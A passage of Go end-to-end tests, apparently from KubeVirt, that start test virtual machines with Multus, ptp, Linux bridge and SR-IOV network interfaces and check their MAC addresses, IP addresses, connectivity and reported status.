InterfaceBindingMethod: v1.InterfaceBindingMethod{
Masquerade: &v1.InterfaceMasquerade{},
},
}
linuxBridgeInterface := v1.Interface{
Name: "linux-bridge",
InterfaceBindingMethod: v1.InterfaceBindingMethod{
Bridge: &v1.InterfaceBridge{},
},
}
defaultNetwork := v1.Network{
Name: "default",
NetworkSource: v1.NetworkSource{
Pod: &v1.PodNetwork{},
},
}
linuxBridgeNetwork := v1.Network{
Name: "linux-bridge",
NetworkSource: v1.NetworkSource{
Multus: &v1.MultusNetwork{
NetworkName: "linux-bridge-net-vlan100",
},
},
}
tests.BeforeAll(func() {
virtClient, err = kubecli.GetKubevirtClient()
tests.PanicOnError(err)
tests.BeforeTestCleanup()
nodes = tests.GetAllSchedulableNodes(virtClient)
Expect(len(nodes.Items) > 0).To(BeTrue())
configureNodeNetwork(virtClient)
result := virtClient.RestClient().
Post().
RequestURI(fmt.Sprintf(postUrl, tests.NamespaceTestDefault, "linux-bridge-net-vlan100")).
Body([]byte(fmt.Sprintf(linuxBridgeConfCRD, "linux-bridge-net-vlan100", tests.NamespaceTestDefault))).
Do(context.Background())
Expect(result.Error()).NotTo(HaveOccurred())
// Create ptp crds with tuning plugin enabled in two different namespaces
result = virtClient.RestClient().
Post().
RequestURI(fmt.Sprintf(postUrl, tests.NamespaceTestDefault, "ptp-conf-1")).
Body([]byte(fmt.Sprintf(ptpConfCRD, "ptp-conf-1", tests.NamespaceTestDefault, ptpSubnet))).
Do(context.Background())
Expect(result.Error()).NotTo(HaveOccurred())
result = virtClient.RestClient().
Post().
RequestURI(fmt.Sprintf(postUrl, tests.NamespaceTestAlternative, "ptp-conf-2")).
Body([]byte(fmt.Sprintf(ptpConfCRD, "ptp-conf-2", tests.NamespaceTestAlternative, ptpSubnet))).
Do(context.Background())
Expect(result.Error()).NotTo(HaveOccurred())
})
BeforeEach(func() {
// Multus tests need to ensure that old VMIs are gone
Expect(virtClient.RestClient().Delete().Namespace(tests.NamespaceTestDefault).Resource("virtualmachineinstances").Do(context.Background()).Error()).To(Succeed())
Expect(virtClient.RestClient().Delete().Namespace(tests.NamespaceTestAlternative).Resource("virtualmachineinstances").Do(context.Background()).Error()).To(Succeed())
Eventually(func() int {
list1, err := virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).List(&v13.ListOptions{})
Expect(err).ToNot(HaveOccurred())
list2, err := virtClient.VirtualMachineInstance(tests.NamespaceTestAlternative).List(&v13.ListOptions{})
Expect(err).ToNot(HaveOccurred())
return len(list1.Items) + len(list2.Items)
}, 6*time.Minute, 1*time.Second).Should(BeZero())
})
createVMIOnNode := func(interfaces []v1.Interface, networks []v1.Network) *v1.VirtualMachineInstance {
vmi := tests.NewRandomVMIWithEphemeralDiskAndUserdata(cd.ContainerDiskFor(cd.ContainerDiskAlpine), "#!/bin/bash\n")
vmi.Spec.Domain.Devices.Interfaces = interfaces
vmi.Spec.Networks = networks
// Arbitrarily select one compute node in the cluster, on which it is possible to create a VMI
// (i.e. a schedulable node).
nodeName := nodes.Items[0].Name
tests.StartVmOnNode(vmi, nodeName)
return vmi
}
Describe("[rfe_id:694][crit:medium][vendor:[email protected]][level:component]VirtualMachineInstance using different types of interfaces.", func() {
const ptpGateway = "10.1.1.1"
Context("VirtualMachineInstance with cni ptp plugin interface", func() {
It("[test_id:1751]should create a virtual machine with one interface", func() {
By("checking virtual machine instance can ping using ptp cni plugin")
detachedVMI := tests.NewRandomVMIWithEphemeralDiskAndUserdata(cd.ContainerDiskFor(cd.ContainerDiskCirros), "#!/bin/bash\necho 'hello'\n")
detachedVMI.Spec.Domain.Devices.Interfaces = []v1.Interface{{Name: "ptp", InterfaceBindingMethod: v1.InterfaceBindingMethod{Bridge: &v1.InterfaceBridge{}}}}
detachedVMI.Spec.Networks = []v1.Network{
{Name: "ptp", NetworkSource: v1.NetworkSource{
Multus: &v1.MultusNetwork{NetworkName: "ptp-conf-1"},
}},
}
_, err = virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Create(detachedVMI)
Expect(err).ToNot(HaveOccurred())
tests.WaitUntilVMIReady(detachedVMI, libnet.WithIPv6(console.LoginToCirros))
Expect(libnet.PingFromVMConsole(detachedVMI, ptpGateway)).To(Succeed())
})
It("[test_id:1752]should create a virtual machine with one interface with network definition from different namespace", func() {
tests.SkipIfOpenShift4("OpenShift 4 does not support usage of the network definition from the different namespace")
By("checking virtual machine instance can ping using ptp cni plugin")
detachedVMI := tests.NewRandomVMIWithEphemeralDiskAndUserdata(cd.ContainerDiskFor(cd.ContainerDiskCirros), "#!/bin/bash\necho 'hello'\n")
detachedVMI.Spec.Domain.Devices.Interfaces = []v1.Interface{{Name: "ptp", InterfaceBindingMethod: v1.InterfaceBindingMethod{Bridge: &v1.InterfaceBridge{}}}}
detachedVMI.Spec.Networks = []v1.Network{
{Name: "ptp", NetworkSource: v1.NetworkSource{
Multus: &v1.MultusNetwork{NetworkName: fmt.Sprintf("%s/%s", tests.NamespaceTestAlternative, "ptp-conf-2")},
}},
}
_, err = virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Create(detachedVMI)
Expect(err).ToNot(HaveOccurred())
tests.WaitUntilVMIReady(detachedVMI, libnet.WithIPv6(console.LoginToCirros))
Expect(libnet.PingFromVMConsole(detachedVMI, ptpGateway)).To(Succeed())
})
It("[test_id:1753]should create a virtual machine with two interfaces", func() {
By("checking virtual machine instance can ping using ptp cni plugin")
detachedVMI := tests.NewRandomVMIWithEphemeralDiskAndUserdata(cd.ContainerDiskFor(cd.ContainerDiskCirros), "#!/bin/bash\necho 'hello'\n")
detachedVMI.Spec.Domain.Devices.Interfaces = []v1.Interface{
defaultInterface,
{Name: "ptp", InterfaceBindingMethod: v1.InterfaceBindingMethod{Bridge: &v1.InterfaceBridge{}}}}
detachedVMI.Spec.Networks = []v1.Network{
defaultNetwork,
{Name: "ptp", NetworkSource: v1.NetworkSource{
Multus: &v1.MultusNetwork{NetworkName: "ptp-conf-1"},
}},
}
_, err = virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Create(detachedVMI)
Expect(err).ToNot(HaveOccurred())
tests.WaitUntilVMIReady(detachedVMI, libnet.WithIPv6(console.LoginToCirros))
cmdCheck := "sudo /sbin/cirros-dhcpc up eth1 > /dev/null\n"
err = console.SafeExpectBatch(detachedVMI, []expect.Batcher{
&expect.BSnd{S: "\n"},
&expect.BExp{R: console.PromptExpression},
&expect.BSnd{S: cmdCheck},
&expect.BExp{R: console.PromptExpression},
&expect.BSnd{S: "ip addr show eth1 | grep 10.1.1 | wc -l\n"},
&expect.BExp{R: console.RetValue("1")},
}, 15)
Expect(err).ToNot(HaveOccurred())
By("checking virtual machine instance has two interfaces")
Expect(checkInterface(detachedVMI, "eth0")).To(Succeed())
Expect(checkInterface(detachedVMI, "eth1")).To(Succeed())
Expect(libnet.PingFromVMConsole(detachedVMI, ptpGateway)).To(Succeed())
})
})
Context("VirtualMachineInstance with multus network as default network", func() {
It("[test_id:1751]should create a virtual machine with one interface with multus default network definition", func() {
detachedVMI := tests.NewRandomVMIWithEphemeralDiskAndUserdata(cd.ContainerDiskFor(cd.ContainerDiskCirros), "#!/bin/bash\necho 'hello'\n")
detachedVMI.Spec.Domain.Devices.Interfaces = []v1.Interface{{Name: "ptp", InterfaceBindingMethod: v1.InterfaceBindingMethod{Bridge: &v1.InterfaceBridge{}}}}
detachedVMI.Spec.Networks = []v1.Network{
{Name: "ptp", NetworkSource: v1.NetworkSource{
Multus: &v1.MultusNetwork{
NetworkName: fmt.Sprintf("%s/%s", tests.NamespaceTestDefault, "ptp-conf-1"),
Default: true,
}}},
}
_, err = virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Create(detachedVMI)
Expect(err).ToNot(HaveOccurred())
tests.WaitUntilVMIReady(detachedVMI, libnet.WithIPv6(console.LoginToCirros))
By("checking virtual machine instance can ping using ptp cni plugin")
Expect(libnet.PingFromVMConsole(detachedVMI, ptpGateway)).To(Succeed())
By("checking virtual machine instance only has one interface")
// lo0, eth0
err = console.SafeExpectBatch(detachedVMI, []expect.Batcher{
&expect.BSnd{S: "\n"},
&expect.BExp{R: console.PromptExpression},
&expect.BSnd{S: "ip link show | grep -c UP\n"},
&expect.BExp{R: "2"},
}, 15)
Expect(err).ToNot(HaveOccurred())
By("checking pod has only one interface")
// lo0, eth0-nic, k6t-eth0, vnet0
output := tests.RunCommandOnVmiPod(detachedVMI, []string{"/bin/bash", "-c", "/usr/sbin/ip link show|grep -c UP"})
ExpectWithOffset(1, strings.TrimSpace(output)).To(Equal("4"))
})
})
Context("VirtualMachineInstance with cni ptp plugin interface with custom MAC address", func() {
It("[test_id:1705]should configure valid custom MAC address on ptp interface when using tuning plugin", func() {
customMacAddress := "50:00:00:00:90:0d"
ptpInterface := v1.Interface{
Name: "ptp",
InterfaceBindingMethod: v1.InterfaceBindingMethod{
Bridge: &v1.InterfaceBridge{},
},
}
ptpNetwork := v1.Network{
Name: "ptp",
NetworkSource: v1.NetworkSource{
Multus: &v1.MultusNetwork{
NetworkName: "ptp-conf-1",
},
},
}
interfaces := []v1.Interface{ptpInterface}
networks := []v1.Network{ptpNetwork}
By("Creating a VM with custom MAC address on its ptp interface.")
interfaces[0].MacAddress = customMacAddress
vmiOne := createVMIOnNode(interfaces, networks)
tests.WaitUntilVMIReady(vmiOne, console.LoginToAlpine)
By("Configuring static IP address to ptp interface.")
Expect(configInterface(vmiOne, "eth0", "10.1.1.1/24")).To(Succeed())
By("Verifying the desired custom MAC is the one that was actually configured on the interface.")
ipLinkShow := fmt.Sprintf("ip link show eth0 | grep -i \"%s\" | wc -l\n", customMacAddress)
err = console.SafeExpectBatch(vmiOne, []expect.Batcher{
&expect.BSnd{S: ipLinkShow},
&expect.BExp{R: "1"},
}, 15)
Expect(err).ToNot(HaveOccurred())
By("Verifying the desired custom MAC is not configured inside the pod namespace.")
vmiPod := tests.GetRunningPodByVirtualMachineInstance(vmiOne, tests.NamespaceTestDefault)
out, err := tests.ExecuteCommandOnPod(
virtClient,
vmiPod,
"compute",
[]string{"sh", "-c", "ip a"},
)
Expect(err).ToNot(HaveOccurred())
Expect(strings.Contains(out, customMacAddress)).To(BeFalse())
})
})
Context("VirtualMachineInstance with Linux bridge plugin interface", func() {
It("[test_id:1577]should create two virtual machines with one interface", func() {
By("checking virtual machine instance can ping the secondary virtual machine instance using Linux bridge CNI plugin")
interfaces := []v1.Interface{linuxBridgeInterface}
networks := []v1.Network{linuxBridgeNetwork}
vmiOne := createVMIOnNode(interfaces, networks)
vmiTwo := createVMIOnNode(interfaces, networks)
tests.WaitUntilVMIReady(vmiOne, console.LoginToAlpine)
tests.WaitUntilVMIReady(vmiTwo, console.LoginToAlpine)
Expect(configInterface(vmiOne, "eth0", "10.1.1.1/24")).To(Succeed())
By("checking virtual machine interface eth0 state")
Expect(checkInterface(vmiOne, "eth0")).To(Succeed())
Expect(configInterface(vmiTwo, "eth0", "10.1.1.2/24")).To(Succeed())
By("checking virtual machine interface eth0 state")
Expect(checkInterface(vmiTwo, "eth0")).To(Succeed())
By("ping between virtual machines")
Expect(libnet.PingFromVMConsole(vmiOne, "10.1.1.2")).To(Succeed())
})
It("[test_id:1578]should create two virtual machines with two interfaces", func() {
By("checking the first virtual machine instance can ping 10.1.1.2 using Linux bridge CNI plugin")
interfaces := []v1.Interface{
defaultInterface,
linuxBridgeInterface,
}
networks := []v1.Network{
defaultNetwork,
linuxBridgeNetwork,
}
vmiOne := createVMIOnNode(interfaces, networks)
vmiTwo := createVMIOnNode(interfaces, networks)
tests.WaitUntilVMIReady(vmiOne, console.LoginToAlpine)
tests.WaitUntilVMIReady(vmiTwo, console.LoginToAlpine)
Expect(configInterface(vmiOne, "eth1", "10.1.1.1/24")).To(Succeed())
By("checking virtual machine interface eth1 state")
Expect(checkInterface(vmiOne, "eth1")).To(Succeed())
Expect(configInterface(vmiTwo, "eth1", "10.1.1.2/24")).To(Succeed())
By("checking virtual machine interface eth1 state")
Expect(checkInterface(vmiTwo, "eth1")).To(Succeed())
By("ping between virtual machines")
Expect(libnet.PingFromVMConsole(vmiOne, "10.1.1.2")).To(Succeed())
})
})
Context("VirtualMachineInstance with Linux bridge CNI plugin interface and custom MAC address.", func() {
customMacAddress := "50:00:00:00:90:0d"
It("[test_id:676]should configure valid custom MAC address on Linux bridge CNI interface.", func() {
By("Creating a VM with Linux bridge CNI network interface and default MAC address.")
vmiTwo := libvmi.NewTestToolingFedora(
libvmi.WithInterface(libvmi.InterfaceDeviceWithMasqueradeBinding()),
libvmi.WithNetwork(v1.DefaultPodNetwork()),
libvmi.WithInterface(linuxBridgeInterface),
libvmi.WithNetwork(&linuxBridgeNetwork),
libvmi.WithCloudInitNoCloudUserData(tests.GetFedoraToolsGuestAgentUserData(), false),
libvmi.WithCloudInitNoCloudNetworkData(cloudInitNetworkDataWithStaticIPsByDevice("eth1", "10.1.1.2/24"), false))
vmiTwo = tests.StartVmOnNode(vmiTwo, nodes.Items[0].Name)
By("Creating another VM with custom MAC address on its Linux bridge CNI interface.")
linuxBridgeInterfaceWithCustomMac := linuxBridgeInterface
linuxBridgeInterfaceWithCustomMac.MacAddress = customMacAddress
vmiOne := libvmi.NewTestToolingFedora(
libvmi.WithInterface(libvmi.InterfaceDeviceWithMasqueradeBinding()),
libvmi.WithNetwork(v1.DefaultPodNetwork()),
libvmi.WithInterface(linuxBridgeInterfaceWithCustomMac),
libvmi.WithNetwork(&linuxBridgeNetwork),
libvmi.WithCloudInitNoCloudUserData(tests.GetFedoraToolsGuestAgentUserData(), false),
libvmi.WithCloudInitNoCloudNetworkData(cloudInitNetworkDataWithStaticIPsByMac(linuxBridgeInterfaceWithCustomMac.Name, customMacAddress, "10.1.1.1/24"), false))
vmiOne = tests.StartVmOnNode(vmiOne, nodes.Items[0].Name)
vmiOne = tests.WaitUntilVMIReady(vmiOne, console.LoginToFedora)
tests.WaitAgentConnected(virtClient, vmiOne)
By("Verifying the desired custom MAC is the one that were actually configured on the interface.")
vmiIfaceStatusByName := libvmi.IndexInterfaceStatusByName(vmiOne)
Expect(vmiIfaceStatusByName).To(HaveKey(linuxBridgeInterfaceWithCustomMac.Name), "should set linux bridge interface with the custom MAC address at VMI Status")
Expect(vmiIfaceStatusByName[linuxBridgeInterfaceWithCustomMac.Name].MAC).To(Equal(customMacAddress), "should set linux bridge interface with the custom MAC address at VMI")
By("Verifying the desired custom MAC is not configured inside the pod namespace.")
vmiPod := tests.GetRunningPodByVirtualMachineInstance(vmiOne, vmiOne.Namespace)
out, err := tests.ExecuteCommandOnPod(
virtClient,
vmiPod,
"compute",
[]string{"sh", "-c", "ip a"},
)
Expect(err).ToNot(HaveOccurred())
Expect(strings.Contains(out, customMacAddress)).To(BeFalse())
By("Ping from the VM with the custom MAC to the other VM.")
tests.WaitUntilVMIReady(vmiTwo, console.LoginToFedora)
Expect(libnet.PingFromVMConsole(vmiOne, "10.1.1.2")).To(Succeed())
})
})
Context("Single VirtualMachineInstance with Linux bridge CNI plugin interface", func() {
It("[test_id:1756]should report all interfaces in Status", func() {
interfaces := []v1.Interface{
defaultInterface,
linuxBridgeInterface,
}
networks := []v1.Network{
defaultNetwork,
linuxBridgeNetwork,
}
vmiOne := createVMIOnNode(interfaces, networks)
tests.WaitUntilVMIReady(vmiOne, console.LoginToAlpine)
updatedVmi, err := virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Get(vmiOne.Name, &metav1.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(len(updatedVmi.Status.Interfaces)).To(Equal(2))
interfacesByName := make(map[string]v1.VirtualMachineInstanceNetworkInterface)
for _, ifc := range updatedVmi.Status.Interfaces {
interfacesByName[ifc.Name] = ifc
}
for _, network := range networks {
ifc, is_present := interfacesByName[network.Name]
Expect(is_present).To(BeTrue())
Expect(ifc.MAC).To(Not(BeZero()))
}
Expect(interfacesByName["default"].MAC).To(Not(Equal(interfacesByName["linux-bridge"].MAC)))
Expect(runSafeCommand(vmiOne, fmt.Sprintf("ip addr show eth0 | grep %s\n", interfacesByName["default"].MAC))).To(Succeed())
Expect(runSafeCommand(vmiOne, fmt.Sprintf("ip addr show eth1 | grep %s\n", interfacesByName["linux-bridge"].MAC))).To(Succeed())
})
})
Context("VirtualMachineInstance with invalid MAC address", func() {
It("[test_id:1713]should failed to start with invalid MAC address", func() {
By("Start VMI")
linuxBridgeIfIdx := 1
vmi := tests.NewRandomVMIWithEphemeralDiskAndUserdata(cd.ContainerDiskFor(cd.ContainerDiskAlpine), "#!/bin/bash\n")
vmi.Spec.Domain.Devices.Interfaces = []v1.Interface{
defaultInterface,
linuxBridgeInterface,
}
vmi.Spec.Domain.Devices.Interfaces[linuxBridgeIfIdx].MacAddress = "de:00c:00c:00:00:de:abc"
vmi.Spec.Networks = []v1.Network{
defaultNetwork,
linuxBridgeNetwork,
}
_, err = virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Create(vmi)
Expect(err).To(HaveOccurred())
testErr := err.(*errors.StatusError)
Expect(testErr.ErrStatus.Reason).To(BeEquivalentTo("Invalid"))
})
})
})
Describe("[rfe_id:1758][crit:medium][vendor:[email protected]][level:component]VirtualMachineInstance definition", func() {
Context("with qemu guest agent", func() {
It("[test_id:1757] should report guest interfaces in VMI status", func() {
interfaces := []v1.Interface{
defaultInterface,
linuxBridgeInterface,
}
networks := []v1.Network{
defaultNetwork,
linuxBridgeNetwork,
}
v4Mask := "/24"
ep1Ip := "1.0.0.10"
ep2Ip := "1.0.0.11"
ep1Cidr := ep1Ip + v4Mask
ep2Cidr := ep2Ip + v4Mask
v6Mask := "/64"
ep1IpV6 := "fe80::ce3d:82ff:fe52:24c0"
ep2IpV6 := "fe80::ce3d:82ff:fe52:24c1"
ep1CidrV6 := ep1IpV6 + v6Mask
ep2CidrV6 := ep2IpV6 + v6Mask
userdata := fmt.Sprintf(`#!/bin/bash
echo "fedora" |passwd fedora --stdin
setenforce 0
ip link add ep1 type veth peer name ep2
ip addr add %s dev ep1
ip addr add %s dev ep2
ip addr add %s dev ep1
ip addr add %s dev ep2
sudo cp /home/fedora/qemu-guest-agent.service /lib/systemd/system/
sudo systemctl daemon-reload
sudo systemctl start qemu-guest-agent
sudo systemctl enable qemu-guest-agent
`, ep1Cidr, ep2Cidr, ep1CidrV6, ep2CidrV6)
agentVMI := tests.NewRandomVMIWithEphemeralDiskAndUserdata(cd.ContainerDiskFor(cd.ContainerDiskFedoraTestTooling), userdata)
agentVMI.Spec.Domain.Devices.Interfaces = interfaces
agentVMI.Spec.Networks = networks
agentVMI.Spec.Domain.Resources.Requests[k8sv1.ResourceMemory] = resource.MustParse("1024M")
By("Starting a VirtualMachineInstance")
agentVMI, err = virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Create(agentVMI)
Expect(err).ToNot(HaveOccurred(), "Should create VMI successfully")
tests.WaitForSuccessfulVMIStart(agentVMI)
// Need to wait for cloud init to finish and start the agent inside the vmi.
tests.WaitAgentConnected(virtClient, agentVMI)
getOptions := &metav1.GetOptions{}
Eventually(func() bool {
updatedVmi, err := virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Get(agentVMI.Name, getOptions)
if err != nil {
return false
}
return len(updatedVmi.Status.Interfaces) == 4
}, 420*time.Second, 4).Should(BeTrue(), "Should have interfaces in vmi status")
updatedVmi, err := virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Get(agentVMI.Name, getOptions)
Expect(err).ToNot(HaveOccurred())
Expect(len(updatedVmi.Status.Interfaces)).To(Equal(4))
interfaceByIfcName := make(map[string]v1.VirtualMachineInstanceNetworkInterface)
for _, ifc := range updatedVmi.Status.Interfaces {
interfaceByIfcName[ifc.InterfaceName] = ifc
}
Expect(interfaceByIfcName["eth0"].Name).To(Equal("default"))
Expect(interfaceByIfcName["eth0"].InterfaceName).To(Equal("eth0"))
Expect(interfaceByIfcName["eth1"].Name).To(Equal("linux-bridge"))
Expect(interfaceByIfcName["eth1"].InterfaceName).To(Equal("eth1"))
Expect(interfaceByIfcName["ep1"].Name).To(Equal(""))
Expect(interfaceByIfcName["ep1"].InterfaceName).To(Equal("ep1"))
Expect(interfaceByIfcName["ep1"].IP).To(Equal(ep1Ip))
Expect(interfaceByIfcName["ep1"].IPs).To(Equal([]string{ep1Ip, ep1IpV6}))
Expect(interfaceByIfcName["ep2"].Name).To(Equal(""))
Expect(interfaceByIfcName["ep2"].InterfaceName).To(Equal("ep2"))
Expect(interfaceByIfcName["ep2"].IP).To(Equal(ep2Ip))
Expect(interfaceByIfcName["ep2"].IPs).To(Equal([]string{ep2Ip, ep2IpV6}))
})
})
})
})
var _ = Describe("[Serial]SRIOV", func() {
var err error
var virtClient kubecli.KubevirtClient
sriovResourceName := os.Getenv("SRIOV_RESOURCE_NAME")
if sriovResourceName == "" {
sriovResourceName = "kubevirt.io/sriov_net"
}
createNetworkAttachementDefinition := func(networkName string, namespace string, networkAttachmentDefinition string) error {
return virtClient.RestClient().
Post().
RequestURI(fmt.Sprintf(postUrl, namespace, networkName)).
Body([]byte(fmt.Sprintf(networkAttachmentDefinition, networkName, namespace, sriovResourceName))).
Do(context.Background()).Error()
}
tests.BeforeAll(func() {
virtClient, err = kubecli.GetKubevirtClient()
tests.PanicOnError(err)
tests.BeforeTestCleanup()
// Check if the hardware supports SRIOV
if err := validateSRIOVSetup(virtClient, sriovResourceName, 1); err != nil {
Skip("Sriov is not enabled in this environment. Skip these tests using - export FUNC_TEST_ARGS='--ginkgo.skip=SRIOV'")
}
Expect(createNetworkAttachementDefinition(sriovnet1, tests.NamespaceTestDefault, sriovConfCRD)).To((Succeed()), "should successfully create the network")
Expect(createNetworkAttachementDefinition(sriovnet2, tests.NamespaceTestDefault, sriovConfCRD)).To((Succeed()), "should successfully create the network")
Expect(createNetworkAttachementDefinition(sriovnet3, tests.NamespaceTestDefault, sriovLinkEnableConfCRD)).To((Succeed()), "should successfully create the network")
})
BeforeEach(func() {
// Multus tests need to ensure that old VMIs are gone
Expect(virtClient.RestClient().Delete().Namespace(tests.NamespaceTestDefault).Resource("virtualmachineinstances").Do(context.Background()).Error()).To(Succeed())
Expect(virtClient.RestClient().Delete().Namespace(tests.NamespaceTestAlternative).Resource("virtualmachineinstances").Do(context.Background()).Error()).To(Succeed())
Eventually(func() int {
list1, err := virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).List(&v13.ListOptions{})
Expect(err).ToNot(HaveOccurred())
list2, err := virtClient.VirtualMachineInstance(tests.NamespaceTestAlternative).List(&v13.ListOptions{})
Expect(err).ToNot(HaveOccurred())
return len(list1.Items) + len(list2.Items)
}, 6*time.Minute, 1*time.Second).Should(BeZero())
})
Context("VirtualMachineInstance with sriov plugin interface", func() {
getSriovVmi := func(networks []string, cloudInitNetworkData string) *v1.VirtualMachineInstance {
withVmiOptions := []libvmi.Option{
libvmi.WithCloudInitNoCloudNetworkData(cloudInitNetworkData, false),
libvmi.WithInterface(libvmi.InterfaceDeviceWithMasqueradeBinding()),
libvmi.WithNetwork(v1.DefaultPodNetwork()),
}
// sriov network interfaces
for _, name := range networks {
withVmiOptions = append(withVmiOptions,
libvmi.WithInterface(libvmi.InterfaceDeviceWithSRIOVBinding(name)),
libvmi.WithNetwork(libvmi.MultusNetwork(name)),
)
}
return libvmi.NewSriovFedora(withVmiOptions...)
}
startVmi := func(vmi *v1.VirtualMachineInstance) *v1.VirtualMachineInstance {
vmi, err = virtClient.VirtualMachineInstance(tests.NamespaceTestDefault).Create(vmi)
Expect(err).ToNot(HaveOccurred())
return vmi
}
waitVmi := func(vmi *v1.VirtualMachineInstance) *v1.VirtualMachineInstance {
// Need to wait for cloud init to finish and start the agent inside the vmi.
vmi, err := virtClient.VirtualMachineInstance(vmi.Namespace).Get(vmi.Name, &metav1.GetOptions{})
Expect(err).ToNot(HaveOccurred())
// Running multi sriov jobs with Kind, DinD is resource extensive, causing DeadlineExceeded transient warning
// Kubevirt re-enqueue the request once it happens, so its safe to ignore this warning.
// see https://github.com/kubevirt/kubevirt/issues/5027
warningsIgnoreList := []string{"unknown error encountered sending command SyncVMI: rpc error: code = DeadlineExceeded desc = context deadline exceeded"}
tests.WaitUntilVMIReadyIgnoreSelectedWarnings(vmi, console.LoginToFedora, warningsIgnoreList)
tests.WaitAgentConnected(virtClient, vmi)
return vmi
}
checkDefaultInterfaceInPod := func(vmi *v1.VirtualMachineInstance) {
vmiPod := tests.GetRunningPodByVirtualMachineInstance(vmi, vmi.Namespace)
By("checking default interface is present")
_, err = tests.ExecuteCommandOnPod(
virtClient,
vmiPod,
"compute",
[]string{"ip", "address", "show", "eth0"},
)
Expect(err).ToNot(HaveOccurred())
By("checking default interface is attached to VMI")
_, err = tests.ExecuteCommandOnPod(
virtClient,
vmiPod,
"compute",
[]string{"ip", "address", "show", "k6t-eth0"},
)
Expect(err).ToNot(HaveOccurred())
}
checkInterfacesInGuest := func(vmi *v1.VirtualMachineInstance, interfaces []string) {
for _, iface := range interfaces {
Expect(checkInterface(vmi, iface)).To(Succeed())
}
}
It("should create virt-launcher pod with CAP_SYS_RESOURCE capability", func() {
tests.EnableFeatureGate(virtconfig.SRIOVLiveMigrationGate)
defer tests.UpdateKubeVirtConfigValueAndWait(tests.KubeVirtDefaultConfig)
vmi := getSriovVmi([]string{sriovnet1}, defaultCloudInitNetworkData())
vmi = startVmi(vmi)
vmi = waitVmi(vmi)
By("Looking up for VMI virt-launcher pod using VMI's label")
virtLauncherPod := tests.GetRunningPodByVirtualMachineInstance(vmi, vmi.Namespace)
Expect(virtLauncherPod).ToNot(BeNil(), "should get virt-launcher pod")
computeContainer := tests.GetComputeContainerOfPod(virtLauncherPod)
Expect(computeContainer).ToNot(BeNil(), "should get virt-launcher pod, compute container")
Expect(computeContainer.SecurityContext.Capabilities.Add).
To(ContainElement(k8sv1.Capability(services.CAP_SYS_RESOURCE)))
})
It("should block migration for SR-IOV VMI's when LiveMigration feature-gate is on", func() {
tests.EnableFeatureGate(virtconfig.LiveMigrationGate)
defer tests.UpdateKubeVirtConfigValueAndWait(tests.KubeVirtDefaultConfig)
vmi := getSriovVmi([]string{sriovnet1}, defaultCloudInitNetworkData())
vmi = startVmi(vmi)
vmi = waitVmi(vmi)
vmim := tests.NewRandomMigration(vmi.Name, vmi.Namespace)
Eventually(func() error {
_, err = virtClient.VirtualMachineInstanceMigration(vmim.Namespace).Create(vmim)
return err
}, 1*time.Minute, 20*time.Second).ShouldNot(Succeed())
})
It("[test_id:1754]should create a virtual machine with sriov interface", func() {
vmi := getSriovVmi([]string{sriovnet1}, defaultCloudInitNetworkData())
vmi = startVmi(vmi)
vmi = waitVmi(vmi)
By("checking KUBEVIRT_RESOURCE_NAME_<networkName> variable is defined in pod")
vmiPod := tests.GetRunningPodByVirtualMachineInstance(vmi, vmi.Namespace)
Expect(validatePodKubevirtResourceName(virtClient, vmiPod, sriovnet1, sriovResourceName)).To(Succeed())
checkDefaultInterfaceInPod(vmi)
By("checking virtual machine instance has two interfaces")
checkInterfacesInGuest(vmi, []string{"eth0", "eth1"})
// there is little we can do beyond just checking two devices are present: PCI slots are different inside
// the guest, and DP doesn't pass information about vendor IDs of allocated devices into the pod, so
// it's hard to match them.
})
It("[test_id:1754]should create a virtual machine with sriov interface with all pci devices on the root bus", func() {
vmi := getSriovVmi([]string{sriovnet1}, defaultCloudInitNetworkData())
vmi.Annotations = map[string]string{
v1.PlacePCIDevicesOnRootComplex: "true",
}
vmi = startVmi(vmi)
vmi = waitVmi(vmi)
By("checking KUBEVIRT_RESOURCE_NAME_<networkName> variable is defined in pod")
vmiPod := tests.GetRunningPodByVirtualMachineInstance(vmi, vmi.Namespace)
Expect(validatePodKubevirtResourceName(virtClient, vmiPod, sriovnet1, sriovResourceName)).To(Succeed())
checkDefaultInterfaceInPod(vmi)
By("checking virtual machine instance has two interfaces")
checkInterfacesInGuest(vmi, []string{"eth0", "eth1"})
domSpec, err := tests.GetRunningVMIDomainSpec(vmi)
Expect(err).ToNot(HaveOccurred())
rootPortController := []api.Controller{}
for _, c := range domSpec.Devices.Controllers {
if c.Model == "pcie-root-port" {
rootPortController = append(rootPortController, c)
}
}
Expect(rootPortController).To(HaveLen(0), "libvirt should not add additional buses to the root one")
})
It("[test_id:3959]should create a virtual machine with sriov interface and dedicatedCPUs", func() {
// In addition to verifying that we can start a VMI with CPU pinning
// this also tests if we've correctly calculated the overhead for VFIO devices.
vmi := getSriovVmi([]string{sriovnet1}, defaultCloudInitNetworkData())
vmi.Spec.Domain.CPU = &v1.CPU{
Cores: 2,
DedicatedCPUPlacement: true,
}
vmi = startVmi(vmi)
vmi = waitVmi(vmi)
By("checking KUBEVIRT_RESOURCE_NAME_<networkName> variable is defined in pod")
vmiPod := tests.GetRunningPodByVirtualMachineInstance(vmi, vmi.Namespace)
Expect(validatePodKubevirtResourceName(virtClient, vmiPod, sriovnet1, sriovResourceName)).To(Succeed())
checkDefaultInterfaceInPod(vmi)
By("checking virtual machine instance has two interfaces")
checkInterfacesInGuest(vmi, []string{"eth0", "eth1"})
})
It("[test_id:3985]should create a virtual machine with sriov interface with custom MAC address", func() {
const mac = "de:ad:00:00:be:ef"
vmi := getSriovVmi([]string{sriovnet1}, defaultCloudInitNetworkData())
vmi.Spec.Domain.Devices.Interfaces[1].MacAddress = mac
vmi = startVmi(vmi)
vmi = waitVmi(vmi)
var interfaceName string
Eventually(func() error {
var err error
vmi, err = virtClient.VirtualMachineInstance(vmi.Namespace).Get(vmi.Name, &metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
interfaceName, err = getInterfaceNameByMAC(vmi, mac)
return err
}, 140*time.Second, 5*time.Second).Should(Succeed())
